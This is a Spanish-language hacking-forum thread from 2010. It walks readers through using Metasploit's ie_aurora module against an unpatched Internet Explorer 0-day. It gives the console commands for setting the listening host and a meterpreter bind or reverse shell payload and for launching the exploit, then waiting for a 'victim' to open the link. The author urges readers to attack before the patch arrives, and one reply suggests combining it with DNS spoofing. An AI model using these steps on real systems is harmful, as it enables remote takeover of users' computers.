elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
27 Mayo 2012, 17:30  


Tema destacado: Entra al canal IRC oficial de #elhacker.net

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado (Moderadores: ANELKAOS, TRICKY)
| | |-+  [Metasploit + 0-day IE] Exploit IE_Aurora
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 4 Ir Abajo Respuesta Imprimir
Autor Tema: [Metasploit + 0-day IE] Exploit IE_Aurora  (Leído 16,183 veces)
Shell Root


Desconectado Desconectado

Mensajes: 2.456


Alex Jurado


Ver Perfil WWW
[Metasploit + 0-day IE] Exploit IE_Aurora
« en: 19 Enero 2010, 22:48 »

[Metasploit + 0-day IE] Exploit IE_Aurora




Descargad el Exploit IE_Aurora.rb de http://www.metasploit.com/redmine/projects/framework/repository/revisions/8136/entry/modules/exploits/windows/browser/ie_aurora.rb. Ponemos el Exploit dentro de la carpeta que nos de la gana, yo la puse en Windows/Browser/Ie_Aurora. Ingresamos a la Consola del Metasploit y cargamos el Exploit Ie_Aurora
Código:
                                 _       _
             _                   | |     (_)_
 ____   ____| |_  ____  ___ ____ | | ___  _| |_
|    \ / _  )  _)/ _  |/___)  _ \| |/ _ \| |  _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
                           |_|


       =[ metasploit v3.3.3-release [core:3.3 api:1.0]
+ -- --=[ 481 exploits - 220 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
       =[ svn r7957 updated 27 days ago (2009.12.23)

Warning: This copy of the Metasploit Framework was last updated 27 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             http://dev.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use windows/browser/ie_aurora
msf exploit(ie_aurora) >

Miramos que opciones tiene y cuales son requeridos
Código:
msf exploit(ie_aurora) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(ie_aurora) >

Llenamos los parametros de SRVHOST, URIPATH y Seleccionamos el PAYLOAD.
Código:
msf exploit(ie_aurora) > set SRVHOST 192.168.0.2
SRVHOST => 192.168.0.2
msf exploit(ie_aurora) > set URIPATH /
URIPATH => /
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ie_aurora) >

Lanzamos el Exploit y esperamos a que la victima ingrese a la URL.
Código:
msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.
msf exploit(ie_aurora) >
[*] Started bind handler
[*] Using URL: http://192.168.0.2:8080/
[*] Server started.

Video:


Se debe a: a que cuando un usuario carga manualmente un sitio Web, código ‭‬javascript especialmente conformado provoca una corrupción de memoria que en última instancia permite el acceso al sistema. Esta vulnerabilidad es extremadamente crítica, y el código lleva circulando libremente por Internet desde hace un par de días, lo que hace más que posible que el exploit, que en principio se diseñó para el robo de propiedad intelectual en un ataque segmentado contra grandes corporaciones, pueda estar explotándose de un modo más generalista.

Fuente: http://www.sahw.com/wp/archivos/2010/01/16/sobre-la-ultima-vulnerabilidad-de-internet-explorer-consejos-practicos-para-usuarios/
« Última modificación: 25 Enero 2010, 03:52 por Shell Root » En línea

---
Vaati

Desconectado Desconectado

Mensajes: 229


NULL


Ver Perfil
Re: [Metasploit + 0-day IE] Exploit IE_Aurora
« Respuesta #1 en: 20 Enero 2010, 01:45 »

Muy interesante....

Seguramente en estos dias pruebo el metasploit...
En línea
alexkof158


Desconectado Desconectado

Mensajes: 413


LOL


Ver Perfil
Re: [Metasploit + 0-day IE] Exploit IE_Aurora
« Respuesta #2 en: 20 Enero 2010, 03:27 »

fuck men la botastes, como siempre sancado buenos tutos
Felicitacionesss :D
En línea

"noproxy"
ikary

Desconectado Desconectado

Mensajes: 127


Ver Perfil
Re: [Metasploit + 0-day IE] Exploit IE_Aurora
« Respuesta #3 en: 20 Enero 2010, 20:44 »

Para este ataque es necesario que la victima se conecte mediante IE?
En línea
Shell Root


Desconectado Desconectado

Mensajes: 2.456


Alex Jurado


Ver Perfil WWW
Re: [Metasploit + 0-day IE] Exploit IE_Aurora
« Respuesta #4 en: 20 Enero 2010, 20:48 »

Para este ataque es necesario que la victima se conecte mediante IE?
Joder, Si el 0Day es de Microsoft, más especificamente en el producto Internet Explorer, tu que crees?
En línea

---
ikary

Desconectado Desconectado

Mensajes: 127


Ver Perfil
Re: [Metasploit + 0-day IE] Exploit IE_Aurora
« Respuesta #5 en: 20 Enero 2010, 21:18 »

Joer, y luego me quejo de la gente que pregunta por preguntar, y soy yo el primero en hacerlo.   :¬¬

Pido perdon por la pregunta ESTUPIDA  :silbar: es que estoy en clase y me aburro XD

Cabe destacar que ataques como este junto con dns_spoof de ettercap por ejemplo funcionan a las mil maravillas. ---> http://foro.elhacker.net/hacking_avanzado/ettercapmetasploit_suplantacion_de_identidad_por_nombre_de_dominio_spoofing-t280675.0.html

Un saludo
« Última modificación: 20 Enero 2010, 21:20 por ikary » En línea
Shell Root


Desconectado Desconectado

Mensajes: 2.456


Alex Jurado


Ver Perfil WWW
Re: [Metasploit + 0-day IE] Exploit IE_Aurora
« Respuesta #6 en: 20 Enero 2010, 21:23 »

Ajam, Ademas el 0Day solo sacaran parche hasta Feb (Eso lei por ahi). Así que venga tio, a darle duro!
En línea

---
dimitrix


Desconectado Desconectado

Mensajes: 4.059



Ver Perfil WWW
Re: [Metasploit + 0-day IE] Exploit IE_Aurora
« Respuesta #7 en: 20 Enero 2010, 22:19 »

Sorry, ya que de Exploit es algo que nunca toqué, pregunto:

Ingresamos a la Consola del Metasploit

y de donde coño saco la consola con el metasploit?
En línea




Shell Root


Desconectado Desconectado

Mensajes: 2.456


Alex Jurado


Ver Perfil WWW
Re: [Metasploit + 0-day IE] Exploit IE_Aurora
« Respuesta #8 en: 20 Enero 2010, 22:31 »

Linux: ./msfconsole
Windows: msfconsole.bat
En línea

---
darkgx

Desconectado Desconectado

Mensajes: 23



Ver Perfil
Re: [Metasploit + 0-day IE] Exploit IE_Aurora
« Respuesta #9 en: 21 Enero 2010, 22:57 »

Hola, acabo de bajar el ie_aurora y lo puse en mi carpeta Windows/exploits/ y cuando pongo

Código:
use windows/exploits/ie_aurora

me dice
Código:
Failed to load module: windows/exploits/ie_aurora
no se porque pasa... me podrian ayudar?

Mi O.S: Win Vista
En línea
Shell Root


Desconectado Desconectado

Mensajes: 2.456


Alex Jurado


Ver Perfil WWW
Re: [Metasploit + 0-day IE] Exploit IE_Aurora
« Respuesta #10 en: 21 Enero 2010, 23:03 »

WTF!, No sé como instalaste ese MSF en WinVista, asi que lo unico que puedo decirte es esto... Mirad la siguiente ruta: \msf3\modules\exploits\windows\browser\, no veo que sea Windows/Exploits... xD

Intentad: use exploit/windows/ie_aurora

Hago una pregunta Stuped! Nombraste el Exploit como ie_aurora.rb?
En línea

---
darkgx

Desconectado Desconectado

Mensajes: 23



Ver Perfil
Re: [Metasploit + 0-day IE] Exploit IE_Aurora
« Respuesta #11 en: 21 Enero 2010, 23:23 »

ahh ya encontre esa ruta... es que tu dijiste que creemos una carpeta xD y yo cree una y lo puse en windir... xD
Bueno encontre la ruta  exploits/windows/browser. hay muchos archivos .rb.

No, no modifique el nombre. ya estaba como ie_aurora. Ahora intente cargar un archivo de la carpeta browser que no sea el ie_aurora.rb y funciono bien.. pero no me funciona el ie_aurora  :( me sige apareciendo el mismo error.  :-\

Código:
[-] Failed to load module: exploits/windows/browser/ie_aurora
es raro que carge todos menos el aurora no?..

EDIT:
Algunos archivos me los habia detectado el antivirus. Me los habia puesto en cuarentena pero ya los volvi a su lugar... quizas si desactivo el UAC?...

2doEDIT!:
Error mio!!! arreglado!!
habia puesto exploits y en realidad era exploit! sin la "s" xD sorry
 ;D
« Última modificación: 21 Enero 2010, 23:34 por darkgx » En línea
S1dD3xt35

Desconectado Desconectado

Mensajes: 34


La respuesta esta siempre esta


Ver Perfil
Re: [Metasploit + 0-day IE] Exploit IE_Aurora
« Respuesta #12 en: 21 Enero 2010, 23:32 »

excelente tuto  ;-) gracias por esta info Shell Root

a probar se adicho   :P
En línea
darkgx

Desconectado Desconectado

Mensajes: 23



Ver Perfil
Re: [Metasploit + 0-day IE] Exploit IE_Aurora
« Respuesta #13 en: 21 Enero 2010, 23:55 »

Porque cuando se conecta el otro usuario me dice Started Bind handler?
y se queda ahi..
En línea
Shell Root


Desconectado Desconectado

Mensajes: 2.456


Alex Jurado


Ver Perfil WWW
Re: [Metasploit + 0-day IE] Exploit IE_Aurora
« Respuesta #14 en: 22 Enero 2010, 01:41 »

Porque cuando se conecta el otro usuario me dice Started Bind handler?
y se queda ahi..
Intentad con el PAYLOAD windows/meterpreter/reverse_tcp
En línea

---
Páginas: [1] 2 3 4 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Fallo de ¿puerto? en metasploit (exploit java)
Hacking Avanzado
illera88 2 2,332 Último mensaje 2 Diciembre 2010, 06:09
por Shell Root
Problema Con Exploit En Metasploit
Bugs y Exploits
Blackhawk222 1 861 Último mensaje 25 Octubre 2011, 20:57
por berz3k
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines